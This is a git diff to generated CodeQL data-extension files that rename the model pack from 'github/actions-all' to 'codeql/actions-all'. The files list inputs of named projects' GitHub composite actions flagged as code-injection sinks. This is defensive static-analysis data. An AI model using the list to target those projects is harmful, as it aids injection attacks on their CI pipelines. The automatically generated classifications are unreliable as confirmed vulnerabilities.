diff --git a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml index 0fbc67e2b1ba..2dd758bbccb5 100644 --- a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml +++ b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["inspektor-gadget/inspektor-gadget", "*", "input.runtime", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml index 6c6a4264d51f..5764bab2ebb9 100644 --- a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml +++ b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["intel-analytics/ipex-llm", "*", "input.extra-dependency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml index ee18012a8f54..bbf2f0dc3dea 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ionic-team/ionic-framework", "*", "input.totalShards", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml index 3dc390527074..de80b5607d86 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ionic-team/ionicons", "*", "input.paths", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml index b98826b9f021..ce748cd8fc92 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ionic-team/stencil", "*", "input.paths", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml index d000c5eb4d51..ae43fb8964db 100644 --- a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml +++ b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ipfs/aegir", "*", "input.browser", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml index 409ef9564d35..06f888fdecfa 100644 --- a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml +++ b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jetbrains/jetbrainsruntime", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml index 60a79604580c..170505a19019 100644 --- a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml +++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jhipster/generator-jhipster", "*", "input.generator-path", "code-injection", "generated"] @@ -21,7 +21,7 @@ extensions: - ["jhipster/generator-jhipster", "*", "input.application-path", "code-injection", "generated"] - ["jhipster/generator-jhipster", "*", "input.extra-args", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["jhipster/generator-jhipster", "*", "input.skip-workflow", "output.skip-workflow", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml index 4effdea078e3..3bc3b24cba85 100644 --- a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml +++ b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jsocol/django-ratelimit", "*", "input.django-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml index d2c44be62611..9ac0e61a0289 100644 --- a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["juicedata/juicefs", "*", "input.compress", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml index 098782a6bef4..2b22333ba027 100644 --- a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jupyter/docker-stacks", "*", "input.variant", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml index e08f4ba9bc24..5277000b2735 100644 --- a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml +++ b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["keycloak/keycloak", "*", "input.job-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml index 973264531584..e596c90c79dc 100644 --- a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml +++ b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kserve/kserve", "*", "input.directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml index 8f6c13884c5c..226fab0382b9 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubeflow/katib", "*", "input.experiments", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml index f7f2f139e85c..892cd78749be 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubeflow/training-operator", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml index 11b423e871c6..f7bd2567ec81 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubernetes-sigs/karpenter", "*", "input.k8sVersion", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml index 954b2d05858f..126bf5c28d78 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubernetes-sigs/kwok", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml index 6cdb74f12782..9ce67a2592d4 100644 --- a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubescape/kubescape", "*", "input.ORIGINAL_TAG", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml index e6820c900e3e..11e82c1bf249 100644 --- a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubeshop/botkube", "*", "input.username", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml index ba3ad6e8b0c9..06418a823ebe 100644 --- a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml +++ b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kyverno/kyverno", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml index 114b8ce168e2..f2d07bc848d0 100644 --- a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml +++ b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lancedb/lance", "*", "input.repo", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml index 834353d89a82..e1e80cb9eb6f 100644 --- a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["launchdarkly/ios-client-sdk", "*", "input.ios-sim", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml index 1c903d71cbef..8a8760c9bf67 100644 --- a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml +++ b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["layer5labs/meshmap-snapshot", "*", "input.assetLocation", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml index c34200337f2d..9374557b62a3 100644 --- a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml +++ b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ldc-developers/ldc", "*", "input.cmake_flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml index 19d14bbe9889..5a27009da98f 100644 --- a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml +++ b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ledgerhq/ledger-live", "*", "input.os", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml index 0308c934d7e3..6ca81714510b 100644 --- a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml +++ b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lerna/lerna", "*", "input.install-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml index 6039a6c36285..0bd932956056 100644 --- a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml +++ b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lf-edge/eve", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml index 4962f4f6281f..896c7ab520ae 100644 --- a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml +++ b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["libgit2/libgit2", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml index 91c9e22df2ae..50bfce009b08 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml index 760858b7eece..8cbaa9ccc744 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lightning-ai/torchmetrics", "*", "input.pypi-dir", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml index 8d219108234c..e25e7fd7560c 100644 --- a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml +++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["linkerd/linkerd2", "*", "input.component", "code-injection", "generated"] @@ -8,7 +8,7 @@ extensions: - ["linkerd/linkerd2", "*", "input.docker-ghcr-username", "code-injection", "generated"] - ["linkerd/linkerd2", "*", "input.docker-ghcr-pat", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["linkerd/linkerd2", "*", "input.component", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml index e889a394563f..d1228eb3df96 100644 --- a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml +++ b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["logseq/publish-spa", "*", "input.accent-color", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml index 8f96daba8df1..b987ca6683bc 100644 --- a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml +++ b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["macvim-dev/macvim", "*", "input.contents", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml index 1e73f98b3d3c..20060fa74459 100644 --- a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mamba-org/mamba", "*", "input.key_suffix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml index c92eb434d475..297b47a3ff53 100644 --- a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["maplibre/maplibre-native", "*", "input.artifact-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml index 9de3892ac0ca..16a0386beabc 100644 --- a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml +++ b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mastodon/mastodon", "*", "input.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml index 2ae0b823187b..37556bcb99d9 100644 --- a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml +++ b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mavlink/qgroundcontrol", "*", "input.aws_secret_access_key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml index 8e2744b2de75..9532f50714ef 100644 --- a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml +++ b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mdanalysis/mdanalysis", "*", "input.extra-pip-deps", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml index bf2e23efba83..465b4145aebe 100644 --- a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["medic/cht-core", "*", "input.hostname", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml index d8d865913021..b607b57693cc 100644 --- a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml +++ b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["medusajs/medusa", "*", "input.pathToSeedData", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml index 1ac30a3790e9..76243ecd6006 100644 --- a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml +++ b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["metabase/metabase", "*", "input.organization_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml index 1c05276abe0e..68c5a0b4b69d 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["metamask/action-create-release-pr", "*", "input.artifacts-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml index c4b67ad5c580..2cf57246d0c4 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["metamask/action-npm-publish", "*", "input.subteam", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml index a4400dde9d4b..9f62363e1692 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/fluentui", "*", "input.workspaces", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml index 8b5566b4996d..0dfbad39abea 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/playwright", "*", "input.report_dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml index 349f66f4387a..eb76e7d7a452 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/wsl", "*", "input.comment", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml index f717bf5c5d8a..7672a6aadbbc 100644 --- a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml +++ b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["milvus-io/milvus", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml index b2a851a0dbab..041705b1f558 100644 --- a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mlflow/mlflow", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml index 054af41f284c..b80d135bfb3a 100644 --- a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml +++ b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["modin-project/modin", "*", "input.parallel", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml index 31eeed0d2516..2e6fc133dd9a 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mozilla/addons-server", "*", "input.run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml index 97adf115bd2e..710cd7951619 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mozilla/bedrock", "*", "input.", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml index 926230e2282f..e64c87b9e073 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mozilla/sccache", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml index 0827f770e31d..2d663b075be4 100644 --- a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["msys2/setup-msys2", "*", "input.systems", "code-injection", "generated"] \ No newline at end of file 
